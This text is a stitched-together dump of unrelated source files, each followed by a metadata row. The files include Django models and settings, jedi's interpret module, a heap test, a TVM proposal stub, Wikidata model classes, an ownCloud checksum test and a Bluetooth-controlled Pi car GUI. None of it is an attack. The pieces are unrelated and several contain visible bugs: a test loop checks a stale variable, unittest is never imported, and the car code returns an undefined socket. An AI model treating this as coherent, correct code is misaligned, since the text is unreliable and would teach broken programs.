def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.updated = timezone.now()
return super(MethodologyMaster, self).save(*args, **kwargs)
class Meta:
ordering = ('name',)
@python_2_unicode_compatible
class ModuleMaster(models.Model):
name = models.CharField(max_length=100)
description = models.TextField(default="")
order = models.IntegerField(default=0)
methodology = models.ForeignKey(MethodologyMaster, on_delete=models.CASCADE, null=True, default=None)
created_by = models.ForeignKey(User, related_name="module_created_by", null=True, on_delete=models.CASCADE)
created = models.DateTimeField(default=datetime.now)
updated_by = models.ForeignKey(User, related_name="module_updated_by", null=True, on_delete=models.CASCADE)
updated = models.DateTimeField(default=datetime.now)
def __str__(self): # __unicode__ on Python 2
return self.name
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.updated = timezone.now()
return super(ModuleMaster, self).save(*args, **kwargs)
class Meta:
ordering = ('name',)
@python_2_unicode_compatible
class CaseMaster(models.Model):
name = models.CharField(max_length=100)
module = models.ForeignKey(ModuleMaster, on_delete=models.CASCADE)
description = models.TextField(default="")
order = models.IntegerField(default=0)
created_by = models.ForeignKey(User, related_name="case_module_created_by", null=True, on_delete=models.CASCADE)
created = models.DateTimeField(default=datetime.now)
updated_by = models.ForeignKey(User, related_name="case_module_updated_by", null=True, on_delete=models.CASCADE)
updated = models.DateTimeField(default=datetime.now)
def __str__(self): # __unicode__ on Python 2
return self.name
def save(self, *args, **kwargs):
if not self.id:
self.created = timezone.now()
self.updated = timezone.now()
return super(CaseMaster, self).save(*args, **kwargs)
class Meta:
ordering = ('name',)
| apache-2.0 | -6,504,898,097,162,188,000 | 38.205128 | 116 | 0.691956 | false | 3.83208 | false | false | false |
hpfem/agros2d | resources/python/jedi/interpret.py | 2 | 5520 | """
Module to handle interpreted Python objects.
"""
import itertools
import tokenize
from jedi import parsing_representation as pr
class ObjectImporter(object):
"""
Import objects in "raw" namespace such as :func:`locals`.
"""
def __init__(self, scope):
self.scope = scope
count = itertools.count()
self._genname = lambda: '*jedi-%s*' % next(count)
"""
Generate unique variable names to avoid name collision.
To avoid name collision to already defined names, generated
names are invalid as Python identifier.
"""
def import_raw_namespace(self, raw_namespace):
"""
Import interpreted Python objects in a namespace.
Three kinds of objects are treated here.
1. Functions and classes. The objects imported like this::
from os.path import join
2. Modules. The objects imported like this::
import os
3. Instances. The objects created like this::
from datetime import datetime
dt = datetime(2013, 1, 1)
:type raw_namespace: dict
:arg raw_namespace: e.g., the dict given by `locals`
"""
scope = self.scope
for (variable, obj) in raw_namespace.items():
objname = getattr(obj, '__name__', None)
# Import functions and classes
module = getattr(obj, '__module__', None)
if module and objname:
fakeimport = self.make_fakeimport(module, objname, variable)
scope.add_import(fakeimport)
continue
# Import modules
if getattr(obj, '__file__', None) and objname:
fakeimport = self.make_fakeimport(objname)
scope.add_import(fakeimport)
continue
# Import instances
objclass = getattr(obj, '__class__', None)
module = getattr(objclass, '__module__', None)
if objclass and module:
alias = self._genname()
fakeimport = self.make_fakeimport(module, objclass.__name__,
alias)
fakestmt = self.make_fakestatement(variable, alias, call=True)
scope.add_import(fakeimport)
scope.add_statement(fakestmt)
continue
def make_fakeimport(self, module, variable=None, alias=None):
"""
Make a fake import object.
The following statements are created depending on what parameters
are given:
- only `module`: ``import <module>``
- `module` and `variable`: ``from <module> import <variable>``
- all: ``from <module> import <variable> as <alias>``
:type module: str
:arg module: ``<module>`` part in ``from <module> import ...``
:type variable: str
:arg variable: ``<variable>`` part in ``from ... import <variable>``
:type alias: str
:arg alias: ``<alias>`` part in ``... import ... as <alias>``.
:rtype: :class:`parsing_representation.Import`
"""
submodule = self.scope._sub_module
if variable:
varname = pr.Name(
module=submodule,
names=[(variable, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
else:
varname = None
modname = pr.Name(
module=submodule,
names=[(module, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
if alias:
aliasname = pr.Name(
module=submodule,
names=[(alias, (-1, 0))],
start_pos=(-1, 0),
end_pos=(None, None))
else:
aliasname = None
if varname:
fakeimport = pr.Import(
module=submodule,
namespace=varname,
from_ns=modname,
alias=aliasname,
start_pos=(-1, 0),
end_pos=(None, None))
else:
fakeimport = pr.Import(
module=submodule,
namespace=modname,
alias=aliasname,
start_pos=(-1, 0),
end_pos=(None, None))
return fakeimport
def make_fakestatement(self, lhs, rhs, call=False):
"""
Make a fake statement object that represents ``lhs = rhs``.
:type call: bool
:arg call: When `call` is true, make a fake statement that represents
``lhs = rhs()``.
:rtype: :class:`parsing_representation.Statement`
"""
submodule = self.scope._sub_module
lhsname = pr.Name(
module=submodule,
names=[(lhs, (0, 0))],
start_pos=(0, 0),
end_pos=(None, None))
rhsname = pr.Name(
module=submodule,
names=[(rhs, (0, 0))],
start_pos=(0, 0),
end_pos=(None, None))
token_list = [lhsname, (tokenize.OP, '=', (0, 0)), rhsname]
if call:
token_list.extend([
(tokenize.OP, '(', (0, 0)),
(tokenize.OP, ')', (0, 0)),
])
return pr.Statement(
module=submodule,
set_vars=[lhsname],
used_vars=[rhsname],
token_list=token_list,
start_pos=(0, 0),
end_pos=(None, None))
| gpl-2.0 | -4,367,904,602,826,180,600 | 31.280702 | 78 | 0.502536 | false | 4.509804 | false | false | false |
joelliusp/SpaceHabit | SpaceHabitRPG/Tests/ForHelpers/Test_Heap.py | 1 | 2353 | from TestDummyObjectMaker import DailySortingTestObject
from SpaceUnitTest import SpaceUnitTest
from collections import OrderedDict
from Heap import Heap
import random
class Test_Heap(SpaceUnitTest):
def setUp(self):
self.testList = []
self.controlList = []
for i in range(0,500):
u = i // 100
r = (500 -i) // 25
f = i
tObj = DailySortingTestObject(u,r,f)
self.testList.append(tObj)
self.controlList.append(tObj)
random.shuffle(self.testList)
print("done")
return super().setUp()
def tearDown(self):
return super().tearDown()
def test_heap_basic_functions(self):
heap = Heap(lambda x,y: x > y)
self.assertTrue(heap.is_empty())
self.assertEqual(len(heap),0)
heap.push(5)
self.assertEqual(len(heap),1)
heap.push_list([3,8,1,4])
self.assertEqual(len(heap),5)
def test_heapsort(self):
heap1 = Heap(lambda x,y: x > y)
presorted = []
for i in range(0,1000):
randNum = random.randint(0,1000)
presorted.append(randNum)
heap1.push(randNum)
sorted = heap1.get_sorted_list()
prev = sorted[0]
for s in sorted:
self.assertTrue(s <= prev)
prev = s
presorted.sort()
self.assertTrue(heap1.is_empty())
for p in presorted:
heap1.push(p)
sorted1 = heap1.get_sorted_list()
prev = sorted1[0]
for s in sorted1:
self.assertTrue(s <= prev)
prev = s
presorted.reverse()
self.assertTrue(heap1.is_empty())
for p in presorted:
heap1.push(p)
sorted2 = heap1.get_sorted_list()
prev = sorted2[0]
for s in sorted2:
self.assertTrue(s <= prev)
prev = s
self.assertTrue(heap1.is_empty())
for i in range(0,1000):
heap1.push(random.randint(0,1000))
prev = heap1.pop()
for p in heap1.popper():
self.assertTrue(s <= prev)
prev = s
def test_multifield_heapsort(self):
heap = Heap(lambda a,b: a.daysUntilTrigger <= b.daysUntilTrigger
and a.urgency >= b.urgency and a.difficulty <= b.difficulty)
heap.push_list(self.testList)
for a,c in zip(heap.popper(),self.controlList):
self.assertEqual(a.daysUntilTrigger,c.daysUntilTrigger)
self.assertEqual(a.urgency,c.urgency)
self.assertEqual(a.difficulty,c.difficulty)
if __name__ == '__main__':
unittest.main()
| mit | -1,268,567,084,576,588,300 | 25.438202 | 70 | 0.632809 | false | 3.232143 | true | false | false |
Gimpneek/exclusive-raid-gym-tracker | app/views/view_sets/personalised_raids_view_set.py | 1 | 1052 | # pylint: disable=too-many-ancestors
""" View Set for personalised Gym api """
from rest_framework import viewsets
from app.models.profile import Profile
from app.models.raid_item import RaidItem
from app.serializers.raid_item import RaidItemSerializer
from app.views.view_sets.common import paginate_raids
class UserRaidsViewSet(viewsets.GenericViewSet):
"""
View Set for active raids on Gyms the logged in user is following
"""
serializer_class = RaidItemSerializer
def get_queryset(self):
""" Override the queryset """
profile = Profile.objects.get(user=self.request.user)
gyms = profile.tracked_gyms.all()
return RaidItem.objects.filter(gym__in=gyms).order_by('id')
def list(self, request):
"""
Define response for the listing of active raids on the user's
tracked gyms
:param request: Django Request
:return: Django Rest Framework Response
"""
queryset = self.get_queryset()
return paginate_raids(self, request, queryset)
| gpl-3.0 | 5,658,764,516,406,136,000 | 32.935484 | 69 | 0.692015 | false | 4 | false | false | false |
mlperf/training_results_v0.7 | Fujitsu/benchmarks/resnet/implementations/implementation_open/mxnet/3rdparty/tvm/topi/python/topi/vision/rcnn/proposal.py | 2 | 3693 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name
"""Proposal operator"""
import math
import tvm
def generate_anchor(ratio, scale, base_size):
"""Generate anchor"""
w = h = float(base_size)
x_ctr = 0.5 * (w - 1.)
y_ctr = 0.5 * (h - 1.)
size = w * h
size_ratios = math.floor(size / ratio)
new_w = math.floor(math.sqrt(size_ratios) + 0.5) * scale
new_h = math.floor((new_w / scale * ratio) + 0.5) * scale
return (x_ctr - 0.5 * (new_w - 1.0), y_ctr - 0.5 * (new_h - 1.0),
x_ctr + 0.5 * (new_w - 1.0), y_ctr + 0.5 * (new_h - 1.0))
def reg_bbox(x1, y1, x2, y2, dx, dy, dw, dh):
"""Bounding box regression function"""
bbox_w = x2 - x1 + 1.0
bbox_h = y2 - y1 + 1.0
ctr_x = x1 + 0.5 * (bbox_w - 1.0)
ctr_y = y1 + 0.5 * (bbox_h - 1.0)
pred_ctr_x = dx * bbox_w + ctr_x
pred_ctr_y = dy * bbox_h + ctr_y
pred_w = tvm.exp(dw) * bbox_w
pred_h = tvm.exp(dh) * bbox_h
pred_x1 = pred_ctr_x - 0.5 * (pred_w - 1.0)
pred_y1 = pred_ctr_y - 0.5 * (pred_h - 1.0)
pred_x2 = pred_ctr_x + 0.5 * (pred_w - 1.0)
pred_y2 = pred_ctr_y + 0.5 * (pred_h - 1.0)
return pred_x1, pred_y1, pred_x2, pred_y2
def reg_iou(x1, y1, x2, y2, dx1, dy1, dx2, dy2):
"""Bounding box regression function"""
pred_x1 = x1 + dx1
pred_y1 = y1 + dy1
pred_x2 = x2 + dx2
pred_y2 = y2 + dy2
return pred_x1, pred_y1, pred_x2, pred_y2
@tvm.target.generic_func
def proposal(cls_prob, bbox_pred, im_info, scales, ratios, feature_stride, threshold,
rpn_pre_nms_top_n, rpn_post_nms_top_n, rpn_min_size, iou_loss):
"""Proposal operator.
Parameters
----------
cls_prob : tvm.Tensor
4-D with shape [batch, 2 * num_anchors, height, width]
bbox_pred : tvm.Tensor
4-D with shape [batch, 4 * num_anchors, height, width]
im_info : tvm.Tensor
2-D with shape [batch, 3]
scales : list/tuple of float
Scales of anchor windoes.
ratios : list/tuple of float
Ratios of anchor windoes.
feature_stride : int
The size of the receptive field each unit in the convolution layer of the rpn, for example
the product of all stride's prior to this layer.
threshold : float
Non-maximum suppression threshold.
rpn_pre_nms_top_n : int
Number of top scoring boxes to apply NMS. -1 to use all boxes.
rpn_post_nms_top_n : int
Number of top scoring boxes to keep after applying NMS to RPN proposals.
rpn_min_size : int
Minimum height or width in proposal.
iou_loss : bool
Usage of IoU loss.
Returns
-------
out : tvm.Tensor
2-D tensor with shape [batch * rpn_post_nms_top_n, 5]. The last dimension is in format of
[batch_index, w_start, h_start, w_end, h_end].
"""
# pylint: disable=unused-argument
raise ValueError("missing register for topi.vision.rcnn.proposal")
| apache-2.0 | -6,410,807,795,262,336,000 | 31.973214 | 98 | 0.622258 | false | 2.995134 | false | false | false |
iago-suarez/ancoweb-TFG | src/ancoweb/settings.py | 1 | 4756 | """
Django settings for ancoweb project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
# Build paths inside the project like this: BASE_DIR / "directory"
from pathlib import Path
BASE_DIR = Path(__file__).resolve().parent.parent
TEMPLATE_DIRS = [str(BASE_DIR / 'templates'), ]
STATICFILES_DIRS = [str(BASE_DIR / 'static'), ]
# Use 12factor inspired environment variables or from a file
import environ
env = environ.Env()
# Ideally move env file should be outside the git repo
# i.e. BASE_DIR.parent.parent
env_file = BASE_DIR.parent / 'local.env'
if env_file.is_file():
environ.Env.read_env(str(env_file))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Raises ImproperlyConfigured exception if SECRET_KEY not in os.environ
SECRET_KEY = env('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Turn off debug while imported by Celery with a workaround
# See http://stackoverflow.com/a/4806384
import sys
if "celery" in sys.argv[0]:
DEBUG = False
# Application definition
INSTALLED_APPS = (
'django_admin_bootstrapped',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'accounts',
'video_manager',
'video_upload',
'crispy_forms',
'integration_tests',
'djangojs',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'ancoweb.urls'
WSGI_APPLICATION = 'ancoweb.wsgi.application'
# Database
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': str(BASE_DIR / 'db.sqlite3'),
'TEST_NAME': str(BASE_DIR / 'tests.sqlite3'),
'TEST': {
'NAME': str(BASE_DIR / 'tests.sqlite3')
}
}
}
# Internationalization
# https://docs.djangoproject.com/en/dev/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/dev/howto/static-files/
MEDIA_URL = '/media/'
MEDIA_ROOT = str(BASE_DIR / 'media/')
STATIC_URL = '/static/'
# Crispy Form Theme - Bootstrap 3
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# For Bootstrap 3, change error alert to 'danger'
from django.contrib import messages
MESSAGE_TAGS = {
messages.ERROR: 'danger'
}
# Progressbar settings
FILE_UPLOAD_HANDLERS = (
"video_upload.handlers.VideoUploadHandler",
"django.core.files.uploadhandler.MemoryFileUploadHandler",
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
PROGRESSBARUPLOAD_INCLUDE_JQUERY = False
# Custom Settings
DEFAULT_VIDEO_ICON = 'site/img/default-video-image.png'
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
RECOGNITIONSYS_BIN = './RecognitionSystem/recognitionsystem'
USED_VIDEO_EXTENSIONS = ['.mp4', '.webm']
LOGIN_REDIRECT_URL = "/"
| apache-2.0 | -9,098,061,760,244,350,000 | 25.276243 | 75 | 0.691127 | false | 3.499632 | false | false | false |
DaniFdezAlvarez/wikidataExplorer | wikidata_exp/wdexp/model/wikidata.py | 1 | 7346 | __author__ = 'Dani'
class WikidataEntity(object):
def __init__(self, entity_id, label=None, description=None, aliases=None,
outcoming_properties_id=None, incoming_properties_id=None, pg_score=None):
self._id = entity_id
self._label = label
self._description = description
if aliases is None:
aliases = []
self._aliases = aliases
if outcoming_properties_id is None: # Dict with key (id_property) and id (number of times)
outcoming_properties_id = {}
self._out_prop = outcoming_properties_id
if incoming_properties_id is None:
incoming_properties_id = {}
self._in_prop = incoming_properties_id
self._pg_score = pg_score
def __str__(self):
return self._id
@property
def id(self):
return self._id
@property
def label(self):
return self._label
@property
def description(self):
return self._description
@property
def aliases(self):
for an_alias in self._aliases:
yield an_alias
@property
def n_aliases(self):
return len(self._aliases)
@property
def outcoming_properties_id(self):
for a_prop in self._out_prop:
for i in range(0, self._out_prop):
yield a_prop
@property
def n_outcoming_properties(self):
result = 0
for a_prop in self._out_prop:
result += self._out_prop[a_prop]
return result
@property
def distinct_outcoming_properties_id(self):
for a_prop in self._out_prop:
yield a_prop
@property
def n_distinct_outcoming_properties_id(self):
return len(self._out_prop)
@property
def incoming_properties_id(self):
for a_prop in self._in_prop:
for i in range(0, self._in_prop):
yield a_prop
@property
def n_incoming_properties(self):
result = 0
for a_prop in self._in_prop:
result += self._in_prop[a_prop]
return result
@property
def distinct_incoming_properties_id(self):
for a_prop in self._in_prop:
yield a_prop
@property
def n_distinct_incoming_properties_id(self):
return len(self._in_prop)
@property
def pg_score(self):
return self._pg_score
@pg_score.setter
def pg_score(self, value):
self._pg_score = value
def n_times_incoming_property(self, a_prop):
if a_prop in self._in_prop:
return self._in_prop[a_prop]
else:
return 0
def n_times_outcoming_prop(self, a_prop):
if a_prop in self._out_prop:
return self._out_prop[a_prop]
else:
return 0
class WikidataProperty(object):
def __init__(self, property_id, label=None, description=None, aliases=None, trends=None,
outcoming_properties_id=None, incoming_properties_id=None, n_appearances=None, rank=None):
self._id = property_id
self._label = label
self._description = description
if aliases is None:
aliases = []
self._aliases = aliases
if trends is None:
trends = []
self._trends = trends
if outcoming_properties_id is None: # Dict with key (id_property) and id (number of times)
outcoming_properties_id = {}
self._out_prop = outcoming_properties_id
if incoming_properties_id is None:
incoming_properties_id = {}
self._in_prop = incoming_properties_id
self._n_appearances = n_appearances
self._rank = rank
def __str__(self):
return self._id
@property
def id(self):
return self._id
@property
def label(self):
return self._label
@property
def description(self):
return self._description
@property
def aliases(self):
for an_alias in self._aliases:
yield an_alias
@property
def n_aliases(self):
return len(self._aliases)
@property
def trends(self):
for a_trend in self._trends:
yield a_trend
def add_trend(self, a_trend):
self._trends.append(a_trend)
@property
def n_trends(self):
return len(self._trends)
@property
def outcoming_properties_id(self):
for a_prop in self._out_prop:
for i in range(0, self._out_prop):
yield a_prop
@property
def n_outcoming_properties(self):
result = 0
for a_prop in self._out_prop:
result += self._out_prop[a_prop]
return result
@property
def distinct_outcoming_properties_id(self):
for a_prop in self._out_prop:
yield a_prop
@property
def n_distinct_outcoming_properties_id(self):
return len(self._out_prop)
@property
def incoming_properties_id(self):
for a_prop in self._in_prop:
for i in range(0, self._in_prop):
yield a_prop
@property
def n_incoming_properties(self):
result = 0
for a_prop in self._in_prop:
result += self._in_prop[a_prop]
return result
@property
def distinct_incoming_properties_id(self):
for a_prop in self._in_prop:
yield a_prop
@property
def n_distinct_incoming_properties_id(self):
return len(self._in_prop)
@property
def n_appearances(self):
return self._n_appearances
@n_appearances.setter
def n_appearances(self, value):
self._n_appearances = value
@property
def rank(self):
return self._rank
@rank.setter
def rank(self, value):
self._rank = value
def n_times_incoming_property(self, a_prop):
if a_prop in self._in_prop:
return self._in_prop[a_prop]
else:
return 0
def n_times_outcoming_prop(self, a_prop):
if a_prop in self._out_prop:
return self._out_prop[a_prop]
else:
return 0
##### LITERAL_TYPES
TYPE_UNKOWN = -1
TYPE_NUMBER = 0
TYPE_STRING = 1
class WikidataLiteral(object):
def __init__(self, value, literal_type=None):
self._value = value
self._type = literal_type
@property
def value(self):
return self._value
@property
def type(self):
return self._type
def __str__(self):
return str(self._value)
class WikidataTriple(object):
def __init__(self, subject, predicate, target_object):
self._subject = subject
self._predicate = predicate
self._object = target_object
@property
def subject(self):
return self._subject
@property
def predicate(self):
return self._predicate
@property
def object(self):
return self._object
def __str__(self):
return str(self.subject) + ", " + str(self._predicate) + ", " + str(self.object)
| gpl-2.0 | 977,541,087,363,265,300 | 22.006536 | 107 | 0.54887 | false | 3.97726 | false | false | false |
labkode/smashbox | protocol/test_protocol_file_checksum.py | 6 | 4068 | from smashbox.utilities import *
from smashbox.utilities.hash_files import *
from smashbox.protocol import chunk_file_upload, file_upload, file_download
import smashbox.protocol
import os
import os.path
@add_worker
def main(step):
d = make_workdir()
reset_owncloud_account()
URL = oc_webdav_url()
logger.info('*** 0. upload without the checksum (files should be accepted by the server)')
filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1))
filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3))
# upload the file without a checksum and then download it to get the checksum type used by the server
file_upload(filename1,URL)
chunk_file_upload(filename2,URL)
file_download(os.path.basename(filename1),URL,d)
r=file_download(os.path.basename(filename2),URL,d)
analyse_hashfiles(d) # make sure that files uploaded without a checksum are not corrupted
logger.info('Got checksum from the server: %s', r.headers['OC-Checksum'])
try:
active_server_checksum_type = r.headers['OC-Checksum'].strip().split(':')[0]
except KeyError,x:
logger.warning('Checksum not enabled for %s',oc_webdav_url(hide_password=True))
return
# now check the checksum type supported on the server
logger.info('Server supports %s checksum',repr(active_server_checksum_type))
smashbox.protocol.enable_checksum(active_server_checksum_type)
logger.info('*** 1. upload with correct checksum (files should be accepted by the server)')
filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1))
filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3))
file_upload(filename1,URL)
chunk_file_upload(filename2,URL)
file_download(os.path.basename(filename1),URL,d)
file_download(os.path.basename(filename2),URL,d)
analyse_hashfiles(d)
# pass around incorrect checksum (of the type supported by the server)
# the puts should be failing
def corrupted_checksum(fn):
c = smashbox.protocol.compute_checksum(fn)
c = c[:-1]+chr(ord(c[-1])+1)
return c
logger.info('*** 2. upload with corrupted checksum value (files should be refused by the server)')
filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1))
filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3))
r = file_upload(filename1,URL,checksum=corrupted_checksum(filename1))
fatal_check(r.rc == 412)
r = chunk_file_upload(filename2,URL,checksum=corrupted_checksum(filename2))
fatal_check(r.rc == 412)
# paranoia check: make sure that the server did not store the corrupted files inspite of returning 412
d_corrupted = mkdir(os.path.join(d,'corrupted_files'))
file_download(os.path.basename(filename1),URL,d_corrupted)
file_download(os.path.basename(filename2),URL,d_corrupted)
fatal_check(os.listdir(d_corrupted)==[])
# pass around a checksum of the type unsupported by the server, including some garbage types (which are not even well-formatted)
# in this case the checksums should be ignored and the files transmitted as if checksum was not provided at all
checksum_types = list(set(smashbox.protocol.known_checksum_types)-set([active_server_checksum_type]))
checksum_types += ['blabla']
logger.info('*** 3. upload with corrupted checksum types and strange values (files should be accepted by the server)')
for value in ['',':bah',':']:
for cstype in checksum_types:
smashbox.protocol.enable_checksum(cstype)
filename1=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(0.1))
filename2=create_hashfile(d,size=OWNCLOUD_CHUNK_SIZE(3.3))
logger.info(' *** testing checkum value: '+cstype+value)
file_upload(filename1,URL,checksum=cstype+value)
chunk_file_upload(filename2,URL,checksum=cstype+value)
file_download(os.path.basename(filename1),URL,d)
file_download(os.path.basename(filename2),URL,d)
analyse_hashfiles(d)
| agpl-3.0 | 1,346,570,418,737,837,000 | 37.018692 | 132 | 0.69469 | false | 3.51599 | false | false | false |
henrybond158/Smart-Programming-Project | PiProgram2.py | 1 | 6190 | #!/usr/bin/python
import pygtk
import pygame
from pygame.locals import *
pygtk.require('2.0')
import gtk
import os
import wheel
import sys, select, tty, termios, bluetooth, time
from evdev import InputDevice, categorize, ecodes # Device Input
import threading
import gobject
#from lib import xbox_read # Controller Lib
# =====> GUI Class
class Base(gtk.Window):
def destroy(self, widget, data=None):
print('you closed the window')
gtk.main_quit()
def forward(self, widget, data=None):
print('you click the forward button')
def backwards(self, widget, data=None):
print('you clicked the back button')
def left(self, widget, data=None):
print('you clicked the left button')
def right(self, widget, data=None):
print('you clicked the right button')
def cruise(self, widget, data=None):
print("you be crusing")
def selection_changed(self, widget, data=None):
print ("keyboard selected")
def xboxController(self, widget, data=None):
print ("xbox selected")
def wheelController(self, widget, data=None):
print("wheel selected")
def selection_changed( self, w, data=None):
self.label.set_label( "Current selection: <b>%s</b>" % data)
def __init__(self):
super(Base, self).__init__()
if Car().test("00:12:05:09:94:45"):
print "[...]\033[92m Connection Successful \033[0m[...]"
else:
print "[...]\033[91m Connection Failed \033[0m [...]"
carClass = Car()
self.sock = carClass.connecting("00:12:05:09:94:45")
WINX = 300
WINY = 200
self.set_title("Car GUI")
self.set_size_request(WINX, WINY)
self.set_position(gtk.WIN_POS_CENTER)
self.set_resizable(False)
# Creating the buttons and other widgets
btn3Turn = gtk.Button("3-P Turn")
btnMenu = gtk.Button("Menu")
btnCruise = gtk.Button("Cruise")
btnSpazz = gtk.Button("Random")
btnStop = gtk.Button("STOP!!!")
self.progbar = gtk.ProgressBar()
self.progbar2 = gtk.ProgressBar()
frame = gtk.Frame("Car's Movement")
lblAction = gtk.Label("<b>The car is moving / action /</b>")
lblAction.set_justify(gtk.JUSTIFY_CENTER)
lblAction.set_size_request(235,60)
lblAction.set_use_markup(True)
frame.set_label_align(0.5,0.5)
frame.add(lblAction)
#setting size
btnSpazz.set_size_request(80,30)
btnCruise.set_size_request(80, 30)
btnMenu.set_size_request(80, 40)
btn3Turn.set_size_request(80, 30)
btnStop.set_size_request(80,30)
fixed = gtk.Fixed()
self.progbar.set_orientation(gtk.PROGRESS_BOTTOM_TO_TOP)
self.progbar2.set_orientation(gtk.PROGRESS_BOTTOM_TO_TOP)
fixed.put(frame, 30,10)
# positioning the widgets
fixed.put(btnCruise ,110 ,110)
fixed.put(btnSpazz ,210 ,110)
fixed.put(btnMenu ,10 , 110)
fixed.put(btn3Turn ,210 , 160)
fixed.put(btnStop,110, 160)
fixed.put(self.progbar,10, 10)
fixed.put(self.progbar2,275, 10)
self.add(fixed)
self.realize()
print 'gogogo'
self.connect("destroy", gtk.main_quit)
# Force SDL to write on our drawing area
os.putenv('SDL_WINDOWID', str(self.window.xid))
gtk.gdk.flush()
pygame.init()
pygame.display.set_mode((WINX,WINY),0,0)
screen = pygame.display.get_surface()
gobject.idle_add(pygame.display.update)
self.show_all()
# screen = pygame.display.get_surface()
# self.joystick = pygame.joystick.Joystick(0)
# self.joystick.init()
# wheelClass = wheel.WheelClass(self.joystick)
time.sleep(5)
print "Running keyboard thread"
KeyboardThread = carClass.keyboard()
# =====> Car Class
class Car:
x = 1
y = 1
last = 0
# screen = pygame.display.get_surface()
pygame.joystick.init()
joystick = pygame.joystick.Joystick(0)
# self.joystick.init()
print "Joystick initialized"
wheelClass = wheel.WheelClass(joystick)
#def __init__(self):
def moveX(self, st): self.x = st
def moveY(self, st): self.y = st
def move(self, spd):
arra = [[5,1,6], [3,0,4], [7,2,8]]
ch = (16 * arra[self.y][self.x]) + spd
if self.last != ch:
self.sock.send(chr(ch))
self.last = ch
def keyboard(self):
print "Keyboard"
# loop around each key press
while True:
# Starts pulling keyboard inputs from pygame
pygame.event.pump()
# Sets keyboard inputs to a variable
self.pressed = pygame.key.get_pressed()
# if either the up/down button is pressed, set the Y axes to
if self.pressed[K_UP]: self.moveY(0)
elif self.pressed[K_DOWN]: self.moveY(2)
else: self.moveY(1)
# if either the left/right button is pressed, set the X axes to
if self.pressed[K_LEFT]: self.moveX(0)
elif self.pressed[K_RIGHT]: self.moveX(2)
else: self.moveX(1)
# Will run the move function, move with set the X/Y vars and move the car accordingly
self.move(8)
# If the escape key is pressed, exit
if self.pressed[K_ESCAPE]: break
def controllerXbox(self):
# Will catch errors
try:
# loop around xbox events
for event in xbox_read.event_stream(deadzone=12000):
# if either the up/down button is pressed, set the Y axes to
if event.key == 'Y1' and event.value > 1: self.moveY(2)
elif event.key == 'Y1' and event.value < 1: self.moveY(0)
else: self.moveY(1)
# if either the left/right button is pressed, set the X axes to
if event.key == 'X1' and event.value > 1: self.moveX(2)
elif event.key == 'X1' and event.value < 1: self.moveX(0)
else: self.moveX(1)
move((int(event.value) /2200))
except:
print '[...] Error With Controller [...]'
def controllerPs3(self):
print '[...] Ps3 Controller [...]'
def wheelHandler(self):
while True:
direction,turning,speed=self.wheelClass.getMov()
self.y = direction
self.x = turning
self.move(speed)
def connecting(self,bdr_addr):
try:
self.sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
self.sock.connect((bdr_addr, 1))
return sock
except: return ''
def test(self,mac):
try:
testSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
testSock.connect((mac, 1))
testSock.close()
time.sleep(1)
return True
except:
return False
##### Accelerometer #####
def axelmeter(self, speed):
self.progbar.set_fraction(speed/11.0)
if __name__ == "__main__":
# cli_menu()
Base()
